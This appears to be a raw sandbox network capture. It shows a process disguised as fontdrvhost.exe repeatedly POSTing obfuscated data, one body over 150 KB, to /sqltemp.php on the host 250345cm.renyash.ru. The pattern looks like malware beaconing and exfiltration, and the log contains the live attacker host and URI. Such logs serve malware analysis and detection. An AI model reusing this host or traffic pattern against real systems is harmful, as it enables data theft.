Jan 1, 2025 14:52:08.713139057 CET	959	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0k3wvpSpcJQb4pKU8pCvVQ5GAsYWMIl%2BCtJxyDSz9SQFKt6%2BDhfo0BkvJnTKtOFlvTvLAdPXD4Qouf8yUHkKlhNg1M8kOf1YQy3mlVPw%2FDdxcxIJVA1PjXSVJIM3GHxNtDilpnuN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fcf48ad4729b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5643&min_rtt=1929&rtt_var=6585&sent=14&recv=14&lost=0&retrans=0&sent_bytes=3187&recv_bytes=3143&delivery_rate=2198795&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1f 26 0c 3d 2d 00 57 24 21 30 5b 3f 03 01 53 25 3d 2e 10 29 2b 39 01 24 2e 3f 11 29 29 37 10 21 2c 21 5e 26 28 2b 00 21 2d 3b 58 25 34 2b 59 05 1c 20 45 36 01 23 03 29 13 2f 5f 26 11 0f 11 30 00 01 05 2b 28 0e 52 20 2b 0d 5b 27 3d 12 11 3d 29 30 56 24 2c 3c 02 2d 3f 0c 0a 33 3a 2c 54 00 11 25 0c 27 22 3c 16 23 19 3c 12 35 21 17 1d 32 24 2e 51 32 12 27 50 20 5f 26 59 25 32 27 12 35 30 25 03 32 3b 2a 03 20 3d 27 19 3d 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&=-W$!0[?S%=.)+9$.?))7!,!^&(+!-;X%4+Y E6#)/_&0+(R +['==)0V$,<-?3:,T%'"<#<5!2$.Q2'P _&Y%2'50%2;* ='=>%S -H?WS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:08.049796104 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:52:08.401794910 CET	1012	OUT	Data Raw: 56 56 5a 56 54 51 54 53 58 56 52 59 56 5f 59 51 5b 59 54 50 55 55 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VVZVTQTSXVRYV_YQ[YTPUUPUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.'<5\ ?=3>#D/U#[8+;)>4Z#T+*8>&<(:&Y.,Y-9
Jan 1, 2025 14:52:08.493539095 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:08.755443096 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kdCE8IoEbXNl1u37YaXLYMRS8T4hitX9b2N7nPKKoxrnVM8vzsd%2FLbKMdWB5wmu%2FvhSmVAYT%2FNxy6gWRK5%2BmK0iqB0tDW5dbkCpBrampkRAOFA4METpWWimxv1NKvNqkYNNZu0Zn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fcf4cb475e60-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1681&rtt_var=645&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=838598&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49737	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:08.972718954 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:52:09.323801994 CET	1012	OUT	Data Raw: 53 54 5f 50 51 58 54 55 58 56 52 59 56 51 59 5e 5b 59 54 58 55 5b 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: ST_PQXTUXVRYVQY^[YTXU[P\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3/Y ?1X' /)14.$(*?W).; T4<B&?:&Y.,Y-
Jan 1, 2025 14:52:09.417026043 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:09.689493895 CET	808	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=inu7lHyCBc%2BgtEzmElAHyW8bknUkCHjb%2F5TEfXEX3GAxvyGzzYSPqH%2FA30wnUZD3ezvCOULy%2Bd3yOM5m5dtRXeNXxQVyyh%2FI0crJgwa6B03qhDfVCd7Mp3izu3UTICZH03jhDu1e"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fcfa9dd4c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4474&min_rtt=1591&rtt_var=6363&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=59212&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49738	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:09.869743109 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:10.214369059 CET	1012	OUT	Data Raw: 56 52 5f 5d 51 5b 54 56 58 56 52 59 56 58 59 55 5b 5c 54 5b 55 5e 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VR_]Q[TVXVRYVXYU[\T[U^P]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.$?.#/'. /24?:$><\74+)D2??R9&Y.,Y-%
Jan 1, 2025 14:52:10.313841105 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:10.579663992 CET	802	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tEmQ0l2Kh3ZLl7gdYSHrI62oeZ7h9WJg2lKwoKHmAlnH8BSGoDocgk7C3whGpTNt%2FMR5T51F%2BYgi9idFnDQN0CVWQZb6HSdFIzLiKRu2bbTobk5GmFWxzkVsYpHm0Nl5cu3jvSw3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd002fc48c0b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4061&min_rtt=1951&rtt_var=4953&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=77507&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:10.723453045 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:11.073700905 CET	1008	OUT	Data Raw: 56 51 5f 52 54 51 54 52 58 56 52 59 56 59 59 56 5b 5b 54 51 55 5f 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VQ_RTQTRXVRYVYYV[[TQU_P]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'?4?-Y0.,!.8Y+)7T>[74+1/,*&Y.,Y-%
Jan 1, 2025 14:52:11.177349091 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:11.447164059 CET	812	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6BNJpCaIn8MSNWoCy5Dn2fRC%2FkI0bm3NZG%2FJBJyGFe7ERWrUYOp2T9NBzOAbNQQORl%2FUukD1EvJHZlBT7zae6oagmxH%2BlIY%2F7oUn0MCdvQKfYTz4v5ubFfI8rmags56gG%2B%2BJYvvX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fd05986042b1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3430&min_rtt=1743&rtt_var=4028&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1327&delivery_rate=95794&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:11.577650070 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:11.754810095 CET	321	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 154108 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:12.105091095 CET	12360	OUT	Data Raw: 56 55 5a 51 51 5b 51 51 58 56 52 59 56 5e 59 50 5b 5a 54 50 55 5a 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VUZQQ[QQXVRYV^YP[ZTPUZP[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.'<9[ <-33/)9V .'+9?*?!"#[<8!1?'9&Y.,Y-
Jan 1, 2025 14:52:12.110088110 CET	2472	OUT	Data Raw: 3c 3b 23 10 3e 3f 01 27 05 28 33 0b 24 5b 3c 3f 01 05 3e 36 3f 00 11 03 00 20 35 0f 0b 2d 34 5e 09 19 30 12 3b 1f 36 20 0e 37 2d 20 31 2f 1a 39 34 00 39 01 3b 0b 3b 1c 08 20 5a 3c 09 29 04 26 0d 21 3f 16 30 2a 59 04 0c 07 21 36 00 20 21 0f 23 28 Data Ascii: <;#>?'(3$[<?>6? 5-4^0;6 7- 1/949;; Z<)&!?0Y!6 !#(8^?,Q'5$,55&%2U5U?5=X4!?$=&?,'?C6:+<[/,)]0=]]!<"%=>>/]+'[8-]0;V5%X2"-,-,(XY<<<%9WY3(=>::8+>VX<!+5UC?,#22(
Jan 1, 2025 14:52:12.110125065 CET	2472	OUT	Data Raw: 3e 20 07 13 08 2d 27 18 2a 14 35 34 0b 3e 0e 5a 30 23 5d 0b 06 03 2d 0f 32 33 11 59 28 5b 20 29 3f 3f 5e 1f 03 07 1b 2b 27 00 3f 1f 2c 5f 53 26 0c 5b 2e 3a 3f 07 5c 07 23 3f 38 20 21 54 12 3e 2e 22 23 1d 09 05 23 1a 3e 05 33 5d 0a 23 26 59 3d 58 Data Ascii: > -'54>Z0#]-23Y([ )??^+'?,_S&[.:?\#?8 !T>."##>3]#&Y=X1V8,??6;7$Y!:X"=> .=5$1<771)-/$# 81/&> '!_Z?YS+\>#0WR %9?/39X"B4([]?]V1,81':5<;)7='\2]##\<
Jan 1, 2025 14:52:12.110141993 CET	2472	OUT	Data Raw: 20 17 3c 5d 01 03 01 21 20 04 2e 1a 02 06 20 2c 2b 12 35 3b 35 39 00 54 3a 34 51 1d 3d 59 09 1c 3f 5a 0f 22 33 2e 14 5a 34 33 25 5e 30 01 38 25 37 36 39 14 3c 3c 0d 3e 07 3a 24 12 05 3f 5c 05 3c 54 0d 12 33 38 2a 19 31 2c 34 56 07 2c 5f 15 39 02 Data Ascii: <]! . ,+5;59T:4Q=Y?Z"3.Z43%^08%769<<>:$?\<T381,4V,_9==?7%&1^<?79X=>#[(1>40<^P1U+710&><19:8ZS->50;X=^1+\[8.(_"[/ =8\'5./YU?77+499'.7&/!?04..],:? -19&I]>RX5:.95P%!(".0=Y>\#<(
Jan 1, 2025 14:52:12.110213995 CET	2472	OUT	Data Raw: 3b 3d 19 26 3c 39 33 53 3b 2c 1e 3c 38 31 19 2e 32 29 15 06 0b 5b 28 5d 32 3d 14 0f 3a 21 3c 15 34 5a 5a 2b 3d 30 38 5f 09 3b 3f 30 3a 31 1c 02 38 36 29 37 39 5a 1a 14 0f 5f 25 3d 0d 21 20 03 3f 57 31 1f 26 05 3a 1b 3a 2f 28 15 02 00 3e 0c 3a 2d Data Ascii: ;=&<93S;,<81.2)[(]2=:!<4ZZ+=08_;?0:186)79Z_%=! ?W1&::/(>:-5&6T1[$%(?\+.%S;+,10_2!/!?>32'Y8]'>(676> P^?9$5?-#W$<7)4>1?.^0()3$$"5$-_)/35W=?31'Y)$5_XS$5:!-.> 13>U:-W\
Jan 1, 2025 14:52:12.110249996 CET	2472	OUT	Data Raw: 3b 3b 03 07 2b 27 1f 5e 07 56 55 21 39 05 06 06 29 2b 1f 35 0c 5b 06 0e 00 33 1c 32 2a 2e 3e 1d 39 20 37 1e 33 05 3b 15 31 06 3d 18 3f 00 25 35 0a 22 20 58 05 00 5e 59 3c 5a 55 3e 08 2b 30 5b 23 02 38 01 27 32 01 5f 39 30 0d 3c 36 3d 37 24 06 2c Data Ascii: ;;+'^VU!9)+5[32.>9 73;1=?%5" X^Y<ZU>+0[#8'2_90<6=7$,V^1[PX?.9\<9;,?=?538063/""<..4<>Q$W? V&%42<>10UZ]Y:8[<455&#2D35?98,',&?$4^SY?X+])8P8?<2,-^-;<C,2:/;6 20!^
Jan 1, 2025 14:52:12.110289097 CET	2472	OUT	Data Raw: 30 06 0f 42 28 1d 35 24 27 5d 44 38 07 06 33 3c 21 3d 5c 07 02 3a 2b 5a 3c 2d 13 27 30 03 0b 05 0e 31 33 10 0d 01 28 07 09 00 13 24 3c 01 35 12 0c 01 3a 26 24 2e 3c 44 2c 26 2e 0e 3f 05 24 58 2e 17 11 53 03 00 09 00 3c 0c 2b 10 36 37 3a 18 32 06 Data Ascii: 0B(5$']D83<!=\:+Z<-'013($<5:&$.<D,&.?$X.S<+67:2W99:;:,V)2T-X5;:(11Y&61'U;*S/>/=]"<?Z ,3)?Z'Y="4X@#.7217\#Z>?)T ?9??) !+]95&,(/?(?'P[!>=7??^<20:C!)>?#-T05
Jan 1, 2025 14:52:12.110301018 CET	2472	OUT	Data Raw: 29 59 3b 14 3a 12 5d 2d 3e 2e 06 5f 36 5d 30 54 3b 03 2f 5f 0d 58 3b 2e 30 39 20 15 3f 05 34 1c 32 00 32 1d 3f 3e 2c 18 2b 03 03 2d 27 31 33 06 3f 0e 11 04 22 55 18 05 3f 0a 21 56 38 59 0e 15 3f 5f 0c 1b 0c 0c 02 2c 08 0d 2a 19 3d 05 26 1d 0b 3a Data Ascii: )Y;:]->._6]0T;/_X;.09 ?422?>,+-'13?"U?!V8Y?_,=&:(8X%5^!$]+[++XB5?-;3%'2;.WSX1_%Y&7>YZ;B:5.?2:FT=>#!46^. Y?2="^<1C)7 Z$>).,77>V?0$>?^_'<"($."<)X4>8
Jan 1, 2025 14:52:12.110378981 CET	4944	OUT	Data Raw: 0f 11 24 10 2d 5b 0b 03 08 5d 17 03 3f 39 35 20 01 21 17 59 21 5a 1e 27 32 29 5a 5c 3a 07 5b 2c 31 32 36 29 03 00 13 26 0a 54 51 59 37 03 38 2a 3b 2d 5e 3d 32 07 0b 3e 27 3c 3c 59 32 5f 2c 30 0e 2e 0f 59 0f 01 3f 21 0f 2e 24 2c 39 09 12 59 34 3d Data Ascii: $-[]?95 !Y!Z'2)Z\:[,126)&TQY78;-^=2>'<<Y2_,0.Y?!.$,9Y4=?@,T31P[/60#$8>+)9.?-_9X"5'<7 (."!TP8 &.?W$-<5!8Z2"01;&(:0.,12?=%/V1<(^^1&5$;0"Y55"V0Z>Y-X?2=U=1"7%
Jan 1, 2025 14:52:12.110416889 CET	2472	OUT	Data Raw: 03 08 3f 19 38 58 30 5b 03 2e 0a 1a 39 33 32 13 27 58 1d 1b 04 2b 11 13 3b 28 1a 39 26 2e 28 13 29 5d 06 11 3a 59 20 20 35 3d 25 1d 26 3f 3f 31 01 59 08 1d 21 1f 19 5e 39 19 2f 19 35 0c 03 5b 39 38 21 2f 24 2f 5a 1b 0f 3a 13 18 0c 57 06 3a 20 1d Data Ascii: ?8X0[.932'X+;(9&.()]:Y 5=%&??1Y!^9/5[98!/$/Z:W: X=?'P;;>0^>#:#7 ?;:5="#W$8Y^'>2>/:&U??!+#UZ?>X+)1[Q:!Z)- '^,8>1-&'_3Q>#U2%>Y=3-<>>%.2
Jan 1, 2025 14:52:12.358217955 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:12.450468063 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:11.873708963 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:12.230207920 CET	1012	OUT	Data Raw: 56 57 5f 54 51 5c 54 50 58 56 52 59 56 58 59 55 5b 5f 54 50 55 5b 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VW_TQ\TPXVRYVXYU[_TPU[PZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'?[4&'>@,4.<[*);S>44"+]>%,(:&Y.,Y-%
Jan 1, 2025 14:52:12.358345985 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49750	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:12.798404932 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
Jan 1, 2025 14:52:13.151906013 CET	1012	OUT	Data Raw: 53 57 5a 54 51 5d 54 54 58 56 52 59 56 5a 59 54 5b 5b 54 5c 55 54 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SWZTQ]TTXVRYVZYT[[T\UTP[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'%[#:';,) ;($)>,]!2+X+;.&,<9*&Y.,Y--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49754	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:13.298629999 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:13.678751945 CET	1012	OUT	Data Raw: 56 5f 5f 51 51 5a 51 50 58 56 52 59 56 58 59 50 5b 5c 54 51 55 58 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: V__QQZQPXVRYVXYP[\TQUXPXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-35\7,9]$=(89%V73+')= Z727?(>%?9&Y.,Y-%
Jan 1, 2025 14:52:13.742327929 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49755	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:13.800731897 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1852 Expect: 100-continue
Jan 1, 2025 14:52:14.152074099 CET	1852	OUT	Data Raw: 53 54 5f 50 54 5e 54 55 58 56 52 59 56 51 59 55 5b 5f 54 5b 55 5c 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: ST_PT^TUXVRYVQYU[_T[U\PZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.[$Y>#/X3X7B8:!.#(9((.(X "/]<:&-:&Y.,Y-
Jan 1, 2025 14:52:14.243860006 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49758	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:14.266036987 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue
